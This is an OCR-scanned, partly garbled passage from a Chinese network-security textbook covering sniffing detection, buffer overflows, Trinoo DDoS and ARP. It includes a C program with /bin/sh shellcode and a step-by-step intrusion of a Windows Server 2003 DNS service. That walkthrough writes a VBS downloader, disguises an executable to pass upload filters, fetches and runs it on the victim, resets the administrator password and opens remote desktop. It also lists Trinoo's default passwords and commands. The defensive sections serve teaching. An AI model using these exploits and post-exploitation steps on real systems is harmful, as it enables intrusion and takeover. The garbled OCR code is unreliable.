主机 ,在 数据 包 首部 包含 应 该 接收 该 数据 包 的 主机 的 MAC 地 址 ,只 有 与 数据 包 中 的 目的 
MAC 地 址 一 致 的 那 台 主 机 接收 数据 包 , 但 是 当 一 台 主 机 的 网 卡 工作 在 监听 模式 (或 混杂 模 
式 ) ,不 管 数据 包 中 的 目的 MAC 地 址 是 什么 ,主机 都 将 接收 。 

但 是 ,在 交换 式 网 络 环境 中 ,进行 网 络 监听 比较 困难 ,不 过 可 以 通过 arp 欺骗 的 方法 截 
获 数据 包 进 而 进行 分 析 。 

(3) 网 络 监 听 的 检测 。 由 于 运行 网 络 监听 软件 的 主机 只 是 被 动 地 接收 在 局 域 网 上 传输 
的 数据 包 ,并 不 主动 与 其 他 主机 交换 信息 :也 不 修改 在 网 上 传输 的 数据 包 , 因 此 发 现 是 否 存 
在 网 络 监听 是 比较 困难 的 。 不 过 ,可 以 使 用 如 下 方法 来 检测 是 否 存在 网 络 监 听 , 如 果 怀 疑 某 
台 计 算 机 (192. 168. 0. 11) 正 在 进行 网 络 监听 ,可 以 用 正确 的 IP 地 址 (192. 168. 0. 11) 和 错误 
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的 MAC 地 址 (任意 ) 去 ping 对 方 (192. 168. 0. 11) ,如 果 能 够 ping 通 , 说 明 192. 168. 0. 11 正 
在 进行 网 络 监听 。 

(4) 网 络 监听 的 防范 。 尽 量 使 用 路 由 器 和 交换 器 来 组 建 网 络 ,不 要 使 用 集线器 。 另 外 ， 
要 时 常 关注 是 否 存在 arp 欺骗 攻击 。 


54 缓冲 区 溢出 


缓冲 区 溢出 是 一 种 常见 的 攻击 手段 ,原因 在 于 缓冲 区 溢出 漏洞 非常 普通 ,并 且 易 于 实 
现 。 更 为 严重 的 是 ,缓冲 区 溢出 漏洞 占 了 远程 网 络 攻击 的 绝 大 多 数 , 成 为 远程 攻击 的 主要 手 
段 ,这 种 攻击 可 以 使 得 一 个 匿名 的 Internet 用 户 有 机 会 获得 一 台 主 机 的 部 分 或 全 部 的 控制 
权 , 所 以 它 代 表 了 一 类 极其 严重 的 安全 威胁 。 
5.4.1 实例 : 缓冲 区 溢出 及 其 原理 

1. 缓冲 区 溢出 实例 一 

实验 环境 : CentOS 5. 0(32bit) 。 


注意 : 如 果 读 者 使 用 新 版 Linux(64bit) ,需要 修改 图 5-10 中 第 8,9 行 。 
第 1 步 : 编写 源 程 序 。 编 写 C 语言 源 程序 ,如 图 5-10 所 示 ,保存 为 buffer_flow. c 文件。 


lfinclude <unistd.h> 

? include <stdlib.h> 

3#include <stdio.h> 

4 #include <string.h> 

S void function(int a, int b, int c) ( 

6 char buffer[8]; //char buffer[9]: 

7 int *ret; 

8 ret = (int?) (buffer + 16); //ret = (int*) (buffer + 17); 


9 (*ret) += 7; 
10) 

1l 

12 int main() ( 

13 int x; 


14 x = 99999; 

15 function(1,2,3); 
16 x1 

1? printf("idin",x); 
18 return 0; 


图 5-10 buffer flow. c XF 
第 2 步 : 编译 源 程序 。 如 图 5-11 所 示 ,执行 井 gcc buffer flow. c -o buffer flow. o fir 
令 ,编译 源 程 序 。 
第 3 步 : 执行 程序 。 如 图 5-11 所 示 ,执行 井 ./buffer_flow. o 命令 ,输出 结果 99999 。 
通过 分 析 主 函数 的 流程 ,应 该 输出 1, 可 是 为 什么 输出 99999 呢 ? 原因 在 于 funtionO rit, 
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[rootelocalhost buffer flow]# gcc buffer_flow.c -o buffer_flow.o 
[rootelocalhost buffer flow]# ./buffer flow.o 

99999 3 
[rootelocalhost buffer flowl# B 


图 5-11 编译 源 程序 


2. buffer_flow 的 分 析 

下 面 对 buffer flow. o 程序 在 内 存 中 的 分 布 情况 以 及 执行 流程 进行 分 析 。 
一 个 程序 在 内 存 中 通常 分 为 程序 段 .数据 段 和 堆栈 。 

CD 程序 段 : 存放 着 程序 的 机 器 码 和 只 读数 据 。 

(2) 数据 段 : 存放 的 是 程序 中 的 静态 数据 和 全 局 变量 。 

(3) 堆栈 : 存放 动态 数据 及 局 部 变量 。 

在 内 存 中 ,它们 的 位 置 如 图 5-12 所 示 。 


堆栈 是 一 块 保存 数据 的 连续 内 存 , 一 个 名 为 堆栈 指 Ee 
针 (SP, 指 向 堆栈 顶部 ) 的 寄存 器 指向 堆栈 的 顶部 ,堆栈 Tu 

的 底部 在 一 个 固定 的 地 址 。 除 了 SP 之 外 ,为 了 使 用 方 oxeooo 0000 
便 , 还 有 指向 帧 内 国定 地 址 的 指针 称 作 帧 指针 CFP)。 从 ET 
理论 上 说 ,局 部 变量 可 以 用 SP 加 偏 移 量 来 引用 。 堆 栈 ”| 命令 行 参数 | 

由 迎 辑 堆栈 框架 组 成 ,一 个 函数 对 应 一 个 堆栈 框架 , 当 is 


EL FE] PR Z H S PE HAE Fe HE A. DEF A AR rp HE AR HE A8 118 PR 
数 的 参数 .返回 地 址 ,EBP 和 局 部 变量 (如 果 函 数 有 局 部 


变量 )。 程 序 执行 结束 后 ,局 部 变量 的 内 容 将 会 丢失 ,但 A aap 
ERAUR. M ROE E a AAE RAE E EMAR P 
弹出 ,然后 弹出 EBP, 恢 复 堆栈 到 调用 函数 时 的 地 址 ,最 PT orenk 
后 弹出 返回 地 址 到 EIP 从 而 继续 运行 程序 。 

调用 函数 function(d, 2. 3) 的 过 程 如 图 5-13 所 示 。 z 

代码 段 0x0804 8000 

Ti Je ARE AG E C 语言 中 参数 的 压 栈 顺序 是 — 110x000 0000 
反 向 的 ,以 从 后 往 前 的 顺序 将 function 的 3 个 参数 3、2、 人 
1 压 人 栈 中 。 


然后 保存 指令 寄存 器 (IP) 中 的 内 容 作为 返回 地 址 (return2) 压 入 栈 中 ; 第 3 个 放 入 栈 的 
是 基 址 寄存 器 EBP( 即 sfp) 。 

接着 把 当前 的 栈 指针 (SP) 复 制 到 EBP, 作 为 新 栈 帧 的 基地 址 (sfp, 栈 帧 指针 ) 。 

最 后 把 SP 减 去 适当 的 数值 ,将 局 部 变量 (buffer 和 ret) 压 入 栈 中 。 

执行 第 8 行 语句 ret— (int * )(bufferl 十 16) 后 .指针 ret 指向 return2 所 指 的 存储 单元 ， 
执行 第 9 行 语句 ( x* ret) 十 二 7 后 .调用 函数 function() 后 的 返回 地 址 (return2 所 指 的 存储 
单元 ) 指 向 了 第 17 行 ,第 16 行 被 隔 过 去 了 ,因此 ,该 程序 的 输出 结果 是 99999。 

3. 缓冲 区 溢出 实例 二 

实验 环境 : CentOS 5. 0(32biD 。 
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[ET L.— 0 duni 


main( ) 栈 帧 


第 14 行 地 址 


执行 第 7 行 
1 后 return2 sf 
1 单元 内 的 地 址 
ss Buffer [4-7 
i SEIT ions 1 function( ) 栈 帧 
低地 址 uffer [0-3] 
栈 项 指针 


printf("%d\n",x); 


Æ 5-13 调用 函数 function(d, 2, 3) 的 过 程 


第 1 步 : 编写 源 程序 。 编 写 C 语言 源 程序 ,如 图 5-14 所 示 , 保 存 为 buffer_flow_2.c 
文件 。 


1#include «stdio.h» 

2#include <string.h> 

3 

4 char shellcode[] = 

5 “\xeb\x1fx5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
“\x89\xf3\x8d\x4e\x08\x8d\x56\xOc\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
“\x80\xe8\xdc\xff\xtf\xff/bin/sh’; 


9 char large string[128]; 
10 
1lint mainQ ( 
char buffer[40]; 
inti; 
long *long_ptr = (long *) large string; 


for (i = 0; i < 32i) 
*(long. ptr + i) = (long ) buffer; 


for (i = 0; i < strlen( shellcode ); i++) 
large string[i] = shellcodefl]; 


strcpy( buffer, large string); 
return 0; 


行 24, 列 2 播 入 


图 5-14 buffer flow 2. c 文件 
第 2 步 : 编译 源 程序 。 如 图 5-15 所 示 ,执行 井 gcc buffer flow 2. c-o buffer flow 2.0 
命令 ,编译 源 程 序 。 
第 3 步 : 执行 程序 。 如 图 5-15 所 示 , 执 行 井 ./buffer_flow_2.o 命令 ,输出 结果 为 
sh-3.2 井 ,表明 溢出 成 功 。 
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[rootelocalhost buffer flow]# gcc buffer flow 2.c -o buffer_flow_2.o 
[ ./buffer flow 2.0 


5-15 ”编译 源 程序 


请 读者 结合 图 5-16 对 buffer_flow_2. o 程序 在 内 存 中 的 分 布 情况 以 及 执行 流程 进行 
分 析 
Buffer[0] 地 址 reirei ( 栈 底 ) 高 地 址 
Buffer[0] 地 址 T 
sfp | 
MREZE, Buffer[36-39] | 
将 large_string[] s i 
的 内 容 复制 到 Buffer[0-3] moB ~， 
Buffer[0] 开 始 的 i ! 
128 字 节 存 储 |j | 
中 ， 此 时 一 am | 
:函数 的 返回 | | 
地 址 (returnl 单 I——— long. ptr | 
元 内 的 地 址 ) " i 
指向 Buffer[0] 行 低地 址 
即 shellcode 第 
代码 ， 当 从 主 a 
函数 返回 , 就 开 || as 
始 执行 溢出 代码 Buffer[0] 地 址 large string[124-127] 
Buffer[0] 地 址 
执行 第 16~20 行 后 ，large_string[] 前 面部 分 是 
shell code[] 的 内 容 ， 后 面部 分 存放 的 是 Buffer[0] 地 址 
| 一 large_string[0-4] 


图 5-16 程序 执行 流程 


5.4.2 实例 : 缓冲 区 溢出 攻击 及 其 防范 

1. 实验 环境 

实验 环境 如 图 5-17 所 示 。 

A B 3€ (192. 168. 85. 1) : 对 192. 168. 85. 128 进行 缓冲 区 溢出 攻击 。 

被 人 侵 者 (192. 168. 85. 128) : 是 开启 DNS 服务 的 所 有 版 本 的 Windows Server 2000 或 
Windows Server 2003 SP1 ,在 本 次 测试 中 使 用 Windows Server 2003 SP1., 
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192.168.85.128 192.168.85.1 
Windows 2003 SP1 Windows XP 
入 侵 者 


图 5-17 实验 环境 


2. 缓冲 区 溢出 攻击 过 程 

第 1 步 : 人 侵 者 下 载 并 且 执 行 dns. exe 命令 。 到 网 上 下 载 dns. exe 工具 ,可 以 通过 
Windows Server 2000, Windows Server 2003 SP1 系统 ， - 复制 到 C:\Documents and 
Settings\ Administrator 中 。 在 DOS 窗口 中 执行 dns. exe 命令 ,如 图 5-18 所 示 。 


UnQuotelt 806 JOY UTION- finti-dep version 
bind ec es? port:1188 addr:8.0.0.0 


4 1030 
port: dns. 


2008a11 : W 2090A +SP: 
2003en 
2003ch: 

ht 


r 


Administ 


图 5-18 ”执行 dns. exe 命令 


2 步 : 寻找 漏洞 。 执 行 dns. exe -s 192. 168. 85. 128 命令 ,对 主机 进行 扫描 ,如 图 
所 示 , 显 示 出 被 入 侵 主 机 (192. 168. 85. 128) 开 放 的 端口 以 及 操作 系统 ,最 主要 的 是 显 帮 
EG 1047 HS 在 漏洞 。 


“1047 :Vulnerability” 


192.1 
RUTION- Anti 
port:1100 ad 


.168.85.128 1847 :Uulnerability 08 :window 2003 


:\Documents_ and Settings\Adninistrator 


图 5-19 寻找 漏洞 


第 3 步 : 实施 溢出 。 如 图 5-20 所 示 ,执行 dns. exe -t 2003chs 192. 168. 85. 128 1047 命 
今 , 其 中 -t 2003chs 的 意思 是 操作 系统 的 型 号 ,-t 2003chs 即 简体 中 文 版 的 Windows Server 
2003 系统 。 如 果 是 Windows Server 2000 的 系统 就 使 用 -2000all 参数 ,192. 168. 85. 128 就 
是 目标 IP 地 址 ,1047 就 是 刚才 扫描 出 存在 漏洞 的 端口 。 

出 现 Attack sent. check port 1100 字样 ,说明 已 经 打开 了 目标 地 址 的 1100 端口 。 
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k port 1188 


ettings\Adninistra 


图 5-20 ”实施 溢出 


第 4 步 : 成 功 入 侵 。 如 图 5-21 所 示 , 执 行 telnet 192. 168. 85. 128 1100 命令 ,结果 如 
图 5-22 所 示 ,现在 已 经 成 功 地 入 侵 了 对 方 的 计算 机 ,并 且 得 到 了 管理 员 的 权限 。 


n 命令 提示 符 [ ->| 


Settings Adninistrator telnet 192.168.85.128 1100 


图 5-21 执行 telnet 192. 168. 85. 128 1100 命令 


图 5-22 成 功 人 侵 


第 5 步 : 如 图 5-23 所 示 , 在 已 经 成 功 入 侵 的 计算 机 上 执行 简单 的 操作 。 
第 6 一 11 步 介 绍 在 被 入侵 计算 机 中 打开 3389 端口 (远程 桌面 ) 的 方法 。 
第 6 步 : 创建 用 来 下 载 的 VBS 脚本 tony. vbs。 在 被 人 侵 计 算 机 的 命令 行 里 输入 如 下 


C:\> echo with wscript:if .arguments. count ^< 2 then .quit:end if > tony. vbs 

C:\> echo set aso = .createobject("adodb. stream") : set web = createobject("microsoft. xmlhttp") 
>> tony. vbs 

C:V» echo web. open "get", .argunents(0), 0: web. send: if web. status ^» 200 then . echo "Error:" + 


web. status:.quit »» tony. vbs 
C:V» echo aso. type = 1:aso. open: aso. write web. responsebody: aso. savetofile . arguments(1),2: 


end with >> tony. vbs 

上 面 的 命令 创建 一 个 用 来 下 载 的 VBS 脚本 tony. vbs。 

第 7 步 : 在 入 侵 者 的 计算 机 上 上 传 wrsky. exe。 把 打开 3389 端口 的 工具 (wrsky. exe. 
可 以 到 网 站 下 载 ) 上 传 到 自己 的 个 人 空间 。 

注意 : 由 于 提供 个 人 空间 的 网 站 都 对 上 传 文件 的 类 型 进行 了 限制 ,允许 的 文件 类 型 及 
大 小 见 表 5-1。 由 此 可 知 ,不 允许 上 传 . exe 文件 ,因此 上 传 之 前 对 文件 的 后 组 进行 修改 , 比 
如 将 wrsky. exe 修改 为 wrsky. rar。 
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9 RU 
8 CONFI 
DATA 


del temp.txt 


图 5-23 简单 的 操作 
表 5-1 个 人 空间 允许 的 文件 类 型 及 大 小 


文件 名 称 扩展 名 文件 限制 文件 名 称 扩展 名 文件 限制 
GIF 图 片 .GIF 1024KB PDF 文件 . PDF 5120KB 
JPEG 图 片 .JPG 1024KB CHM 文件 .CHM 5120KB 
PNG 图 片 .PNG 1024KB tar 压缩 文件 .TAR 5120KB 
Flash 动画 .SWF 1024KB gz 压缩 文件 .GZ 5120KB 
ZIP 压缩 文件 “ZIP 5120KB bz2 压缩 文件 . BZ2 5120KB 
RAR 压缩 文件 .RAR 5120KB RPM 文件 .RPM 5120KB 


第 8 步 : 在 被 人 侵 计算 机 上 下 载 wrsky. exe。 如 图 5-24 所 示 ,在 被 入 侵 计 算 机 的 命令 


行 里 输入 cscript tony. vbs http://xxx. xxx. xxx/blog/upfile2/080313214807. rar c: wrsky. 


exe 命令 ,其 中 http://xxx. xxx. xxx/blog/upfile2/080313214807. rar 为 将 wrsky. rar 上 传 
到 个 人 空间 后 的 URL。 这 条 命令 将 080313214807. rar 下 载 并 且 重 新 命名 为 wrsky. exe. 
第 9 步 : 在 被 人 侵 计算 机 上 执行 wrsky. exe 命令 。 如 图 5-25 所 示 , 在 入 侵 计 算 机 的 命 
令 行 执行 wrsky. exe 命令 ,获得 帮助 信息 
第 10 步 : 重新 设置 被 和 人 侵 计算 机 的 管理 员 密码 。 如 图 5-26 所 示 ,在 人 侵 计算 机 的 命令 
行 执行 net user administrator 123456 命令 .对 管理 员 账 号 重新 设置 密码 为 123456 .为 了 下 
面 能 够 以 管理 员 身 份 远程 桌面 登录 。 
第 11 步 : 打开 被 人 侵 计 算 机 的 远程 桌面 服务 。 如 图 5-27 所 示 ,在 被 和 人 侵 计 算 机 的 命令 
135 


[UTOR 第 2 版 ) 


Telnet 
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图 5-24 在 被 人 侵 计算 机 上 下 载 wrsky. exe 


Telnet 192.168.85.128 [-| 


图 5-25 ”执行 wrsky. exe 命令 


行 执行 wrsky. exe -x 8686 命令 ,打开 对 方 的 远程 桌面 服务 ,并 且 使 用 8686 端口 ,再 输入 
wrsky. exe -r 命令 。 

第 12 步 : 远程 桌面 连接 被 入 侵 计算 机 。 在 本 地 计算 机 ,选择 “开始 ”一 
打开 的 对 话 框 里 执行 mstse MS Terminal Server Client) 命令 后 .如 图 5 
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192.168. 85. 128:8686 , 单 击 “ 连 接 ? 按 钮 ,输入 管理 员 账 号 和 密码 (Administrator、123456 ) , 
登录 上 去 后 如 图 5-29 Bros 。 


Telnet 192. 168. 85- 128 [-|e[x| 


图 5-26 重 设 管理 员 密码 


EE rp 


计算 机 (C): |192. 168.85. 128:8686 


Co] 关闭 [mo ] (mo >>] 


图 5-27 执行 wrsky. exe -x 8686 命令 图 5-28 远程 桌面 连接 


强 192. 168. 85. 128: 8686 - 远程 桌面 


图 5-29 远程 桌面 连接 被 入侵 计 算 机 
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3. 缓冲 区 溢出 攻击 的 防范 措施 

(1) 关闭 不 需要 的 特权 程序 。 

(2) 及 时 给 系统 和 服务 程序 漏洞 打 补丁 。 

(3) 强制 写 正确 的 代码 。 

(4) 通过 操作 系统 使 得 缓冲 区 不 可 执行 ,从 而 阻止 攻击 者 植 入 攻击 代码 。 

(5) 利用 编译 器 的 边界 检查 来 实现 缓冲 区 的 保护 ,这 个 方法 使 得 缓冲 区 溢出 不 可 能 出 
现 , 从 而 完全 消除 了 缓冲 区 溢出 的 威胁 ,但 是 代价 比较 大 。 

(6) 在 程序 指针 失效 前 进行 完整 性 检查 。 

(7) 改进 系统 内 部 安全 机 制 。 


55 DoS 与 DDoS 攻击 检测 与 防御 


自从 1999 年 下 半年 以 来 ,互联 网 上 许多 大 网 站 就 接连 不 断 地 遭 到 拒绝 服务 攻击 。 美 国 
的 政府 网 站 ,白宫 .Microsoft CNN, Yahoo, ZDNet、Ebay、 纽 约 时 报 等 网 站 都 遭 到 过 拒绝 服 
务 攻击 。 我 国 网 站 遭 到 拒绝 服务 攻击 的 情况 也 十 分 普遍 , 绝 大 多 数 的 ISP( 互 联网 服务 提供 
商 )、 网 站 和 电信 公司 都 曾 遭 到 拒绝 服务 攻击 ,尤其 是 在 宽带 用 户 数量 大 幅度 增加 之 后 ,拒绝 
服务 攻击 变 得 更 为 严重 。 实 施 这 种 攻击 的 难度 比较 小 ,但 破坏 性 却 很 大 。 


5.5.1 示例 一 一 DDoS 攻击 
模拟 实验 环境 如 图 5-30 所 示 。 

在 UDP 27444 

端口 监听 

在 UDP 


31335 
端口 监听 


代理 端 192.168.0.21 


日 代理 端 192.168.0.22 


i 27665 
端口 监听 


m 192.168.023 ^. X 


192.168.0.11 a EN 
EE ud m 
3 eee 
192.168.0.1 i. 2^ — 192.168.0.31 
acie [68.0.24 
主 控 端 
192.168.0.12 B... 168.0.25 


图 5-30 ”模拟 实验 环境 


DDoS 攻击 不 断 在 Internet 出 现 , 并 在 应 用 的 过 程 中 不 断 地 得 到 完善 ,DDoS 采用 多 层 
C/S 结构 ,一 个 完整 的 DDoS 攻击 体系 一 般 包 含 4 个 部 分 : 攻击 者 、 主 控 端 ,代理 端 和 被 攻 
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击 者 ,其 体系 结构 如 图 5-30 所 示 。 这 种 多 层 C/S 结构 ,使 DDoS 具有 更 强 的 攻击 能 力 ,并 且 
能 较 好 地 隐藏 攻击 者 的 真实 地 址 。 

DDoS 已 有 一 系列 比较 成 熟 的 软件 产品 ,如 Trinoo、TFN、TFN2K 等 ,它们 的 基本 核心 
和 攻击 思路 是 类 似 的 ,下 面 通过 Trinoo( 拒 绝 服 务 攻击 工具 包 ) 对 DDoS 攻击 进行 介绍 。 

Trinoo 是 基于 UDP Flood 的 攻击 软件 , 它 向 被 攻击 目标 主机 的 随机 端口 发 送 全 零 的 
4 字 节 UDP 包 , 被 攻击 主机 的 网 络 性 能 在 处 理 这 些 超出 其 处 理 能 力 的 垃圾 数据 包 的 过 程 中 
不 断 下 降 ,直至 不 能 提供 正常 服务 甚至 崩溃 ,Trinoo 使 用 的 端口 如 下 。 

CD 攻击 者 主机 到 主 控 端 主机 27665/ TCP. 

(20 主 控 端 主机 到 代理 端 主 机 27444/UDP。 

(3) 代理 端 主机 到 主 控 端 主机 31335/UDP。 

Trinoo 网 络 由 主 控 端 (master. c) 和 Trinoo 代理 端 (ns. c) 组 成 。 典 型 的 Trinoo 网 络 结 
构 如 图 5-30 所 示 。 

Trinoo 通过 3 个 模块 实现 攻击 功能 。 

CD 攻击 守护 进程 (NS), 见 图 5-30 中 的 代理 端 。 

(2) 攻击 控制 进程 (MASTER), 见 图 5-30 中 的 主 控 端 。 

(3) 客户 端 (标准 telnet, netcat 等 ), 见 图 5-30 中 的 攻击 者 。 

攻击 守护 进程 (NS) 是 真正 实施 攻击 的 程序 , 它 一 般 和 攻击 控制 进程 (MASTER) 所 在 
主机 分 离 ,在 源 文件 ns. c 编译 时 ,需要 加 入 可 控制 其 执行 的 攻击 控制 进程 (MASTER) 所 在 
主机 IP,( 只 有 在 ns. c 中 的 IP 方 可 发 起 NS 的 攻击 行为 ) 编 译 成 功 后 ,黑客 通过 目前 比较 成 
熟 的 主机 系统 漏洞 破解 (如 RPC. CMSD, RPC. TTDBSERVER,RPC. STATD) 可 以 方便 地 
将 大 量 NS 植 入 互联 网 中 有 上 述 漏洞 主机 内 。NS 运行 时 ,会 首先 向 攻击 控制 进程 
(MASTER) 所 在 主机 的 31335 端口 发 送 内 容 为 HELLO 的 UDP 包 , 表 示 它 自身 的 存在 , 随 
后 攻击 守护 进程 即 处 于 对 端口 27444 的 侦 听 状态 ,等 待 MASTER 攻击 指令 的 到 来 。 

攻击 控制 进程 (MASTER) 在 收 到 攻击 守护 进程 的 HELLO 包 后 ,会 在 自己 所 在 目录 生 
成 一 个 加 密 的 可 利用 主机 表 文 件 , MASTER 的 启动 是 需要 密码 的 ,在 正确 输入 默认 密码 
gOrave 后 ,MASTER 即 成 功 启动 , 它 一 方面 侦 听 端口 31335 ,等 待 攻击 守护 进程 的 HELLO 
f); 另 一 方面 侦 听 端口 27665 ,等 待 客户 端 对 其 的 连接 。 当 客户 端 连接 成 功 并 发 出 指令 时 ， 
MASTER 所 在 主机 将 向 攻击 守护 进程 NS 所 在 主机 的 27444 端口 传递 指令 。 

客户 端 不 是 Trinoo 自 带 的 一 部 分 ,可 用 标准 的 能 提供 TCP 连接 的 程序 ,如 telnet、 
netcat 等 ,连接 MASTER 所 在 主机 的 27665 端口 .输入 默认 密码 betaalmostdone 后 , 即 完 
成 了 连接 工作 ,进入 攻击 控制 可 操作 的 提示 状态 。 

Trinoo 主 控 端 的 远程 控制 是 通过 在 27665/TCP 端口 建立 TCP 连接 实现 的 。 在 连接 
建立 后 ,用 户 必须 提供 正确 的 口令 (betaalmostdone)。 如 果 在 已 有 人 通过 验证 时 又 有 另外 
的 连接 建立 , 则 一 个 包含 正在 连接 TP 地 址 的 警告 信息 会 发 送 到 已 连接 主机 (程序 提供 的 IP 
地 址 似乎 有 错 , 但 警告 信息 仍 被 发 送 ) 。 毫 无 疑问 ,这 个 功能 最 终 的 完整 实现 将 能 给 予 攻击 
者 足够 的 时 间 在 离开 之 前 清除 痕迹 。 

如 表 5-2 一 表 5-4 所 示 分 别 是 默认 的 口令 . 主 控 端 命令 .代理 端 命令 及 各 自 的 说 明 。 


139 


表 5-2 默认 的 口令 及 其 说 明 


默认 的 口令 说 明 
betaalmostdone trinoo 主 控 端 远程 接口 口令 
gOrave trinoo 主 控 端 启动 (提示 “??”) 
killme trinoo 主 控 端 控制 指令 mdie 用 于 验证 口令 
144adsl trino 代理 端口 令 
表 5-3 主 控 端 命令 及 其 说 明 
fn 令 说 明 
bcast 列 出 所 有 激活 的 广播 主机 
die 关闭 主 控 端 
dos 对 某 一 目标 主机 实施 攻击 ,如 dos 12. 34. 45. 56 
help [cmd] 服务 器 或 命令 的 帮助 信息 
info 打印 版 本 和 编译 信息 
killdead 尝试 清除 死 锁 的 广播 主机 
mdie 停止 正在 实施 的 攻击 ,使 用 这 一 功能 需要 输入 口令 killme 
mdos 对 多 个 目标 主机 实施 攻击 
mping 请 求 攻击 守护 进程 NS 回应 ,监测 NS 是 否 工 作 
msize 设置 DoS 攻击 时 使 用 的 UDP 包 的 大 小 
mtimer N 设 定 攻 击 时 长 为 N 秒 
nslookup host 对 指定 的 主机 进行 域名 查询 
quit 退出 主 控 端 登录 
usebackup 切换 到 由 killdead 命令 建立 的 广播 主机 备份 文件 
表 5-4 代理 端 命令 及 其 说 明 
命 令 说 明 
aaa pass IP 攻击 指定 的 IP 地 址 
rsz N 设置 DoS 攻击 的 缓冲 区 大 小 为 N 字 节 


xyz pass 123;ipl:ip2:ip3 


多 个 DoS 攻击 。 类 似 “aaa” 命 令 , 但 可 以 同时 攻击 多 个 IP 地 址 


5.5.2 DoS 与 DDoS 攻击 的 原理 
下 面 首先 了 解 什么 是 DoS 与 DDoS 攻击 。 


(D DoS 


DoS( Denial of Service, 拒 绝 服务 ) 攻 击 是 通过 对 主机 特定 漏洞 的 利用 进行 攻击 导致 网 
络 栈 失效 、 系 统 骨 溃 、 主 机 死机 而 无 法 提供 正常 的 网 络 服务 功能 .从 而 造成 拒绝 服务 ,或 者 利 
用 合理 的 服务 请 求 来 占用 过 多 的 服务 器 资源 (包括 网 络 带宽 文件 系统 空间 容量 或 者 网 络 连 
接 等 ) ,致使 服务 器 超载 ,最 终 无 法 响应 其 他 用 户 正 常 的 服务 请 求 。 

DoS 攻击 一 般 采 用 一 对 一 的 方式 。 

常见 的 DoS 攻击 方式 有 死亡 之 ping (ping of death), TCP 全 连接 攻击 、SYN Flood, 
SYN/ACK Flood, TearDrop, Land, Smurf, ii] Script 脚本 攻击 、UDP 攻击 等 。 
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(2) DDoS 

DDoS(Distributed Denial of Service, 分 布 式 拒 绝 服务 ) 攻 击 , 又 被 称 为 “洪水 式 攻 击 ”， 
是 在 DoS 攻击 的 基础 上 产生 的 一 种 分 布 式 、 协 作 式 的 大 规模 拒绝 服务 攻击 方式 ,其 攻击 策 
略 侧重 于 通过 很 多 “僵尸 主机 ”( 被 攻击 者 人 侵 过 或 可 间接 利用 的 主机 ?向 受害 主机 发 送 大 量 
看 似 合 法 的 网 络 数据 包 , 从 而 造成 网 络 阻塞 或 服务 器 资源 耗 尽 而 导致 拒绝 服务 ,分 布 式 拒绝 
服务 攻击 一 旦 被 实施 ,攻击 网 络 数据 包 就 会 如 洪水 般 涌 向 受害 主机 ,从 而 把 合法 用 户 的 网 络 
数据 包 淹 没 , 导 致 合法 用 户 无 法 正常 访问 服务 器 的 网 络 资源 。DDoS 攻击 是 目前 难以 防范 
的 攻击 手段 ,这 种 攻击 主要 针对 大 的 站 点 。 由 于 攻守 双方 系统 资源 的 差距 悬殊 ,DDoS 攻击 
具有 更 大 的 破坏 性 。 

DDoS 的 攻击 形式 主要 有 流量 攻击 和 资源 耗 尽 攻击 。 

CD 流量 攻击 : 主要 是 针对 网 络 带 宽 的 攻击 , 即 大 量 攻 击 包 导致 网 络 带 宽 被 阻塞 , 合 
网 络 包 被 虚假 的 攻击 包 淹 没 而 无 法 到 达 主 机 。 

© 资源 耗 尽 攻击 : 主要 是 针对 服务 器 主机 的 攻击 , 即 通 过 大 量 攻 击 包 导致 主机 的 内 存 
被 耗 尽 或 CPU 被 占 完 而 导致 无 法 提供 正常 网 络 服务 。 

DDoS 攻击 采用 多 对 一 的 方式 。 

常见 的 DDoS 攻击 方式 有 SYN Flood, ACK Flood, UDP Flood, ICMP Flood, TCP 
Flood,Connections Flood,Script Flood, Proxy Flood 等 。 


5.5.3 DoS 与 DDoS 攻击 检测 与 防范 


1. 拒绝 服务 攻击 的 检测 

常用 的 检测 方法 有 使 用 ping 命令 检测 和 使 用 netstat 命令 检测 。 

CD. 使 用 ping 命令 检测 。 使 用 ping 命令 检测 时 如 果 出 现 超时 或 者 严重 丢 包 的 现象 , 则 
有 可 能 受到 了 流量 攻击 。 如 果 使 用 ping 命令 测试 某 服 务 器 时 基本 正常 ,但 无 法 访问 服务 
(比如 无 法 打开 网 页 等 ) ,而 ping 同一 交换 机 上 的 其 他 主机 正常 , 则 有 可 能 是 受到 了 资源 耗 
尽 攻击 。 

(2) 使 用 netstat 命令 检测 。 在 服务 器 上 执行 netstat-an 命令 ,如 果 显 示 大 量 的 SYN_ 
RECEIVED, TIME WAIT,FIN WAIT 1 等 状态 ,而 ESTABLISHED 状态 很 少 , 则 可 以 判 
定 是 受到 了 资源 耗 尽 攻击 。 

2. 拒绝 服务 攻击 的 防范 

防范 DDoS 是 一 个 系统 工程 , 若 想 仅仅 依靠 某 种 系统 或 产品 防范 DDoS 是 不 现实 的 , 目 
前 ,完全 杜绝 DDoS 也 是 不 可 能 的 ,但 是 ,通过 适当 的 措施 还 是 可 以 防范 大 多 数 一 般 性 的 
DDoS 攻击 。 

CD 采用 高 性 能 的 网 络 设 备 。 最 好 采用 高 性 能 的 网 络 设备 ,并 且 及 时 升级 主机 服务 器 
的 硬件 配置 ,尤其 是 主机 和 内 存 , 以 提高 抗拒 绝 服务 攻击 的 能 力 。 

(2) 避免 NAT 的 使 用 。 无 论 是 路 由 器 还 是 防火 墙 都 要 避免 使 用 NAT( 网 络 地 址 
转换 ) 。 

(3) 充足 的 网 络 带 宽 。 网 络 带 宽 直 接 决定 了 网 络 能 够 承受 拒绝 服务 攻击 的 能 力 。 

(4) 把 网 站 做 成 静态 页 面 。 把 网 站 尽 可 能 做 成 静态 页 面 , 不 仅 可 以 提高 抗 攻 击 能 力 ,还 
能 够 增加 黑客 入侵 的 难度 ,比如 搜狐 、 新 浪 等 大 型 门户 网 站 主要 采用 静态 页 面 。 
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G) 增强 操作 系统 的 TCP/IP 栈 。 

(6) 安装 专业 抗 DDoS 防火 墙 。 

CD 采用 负载 均衡 技术 。 将 网 站 分 布 在 多 个 主机 上 ,每 个 主机 只 提供 网 站 的 一 部 分 服 
务 , 以 避免 受 攻击 时 全 部 瘫痪 。 


56 ap 欺骗 


arp 命令 用 于 确定 IP 地 址 对 应 的 物理 地 址 ,执行 arp 命令 能 够 查看 本 地 计算 机 arp 高 
速 缓存 中 的 内 容 , 使 用 arp 命令 可 以 用 手工 方式 输入 静态 的 IP 地 址 /MAC 地 址 对 。 

按照 默认 设置 ,arp 高 速 缓存 中 的 项 目 是 动态 的 ,如 果 arp 高 速 缓存 中 的 动态 项 目 (IP 
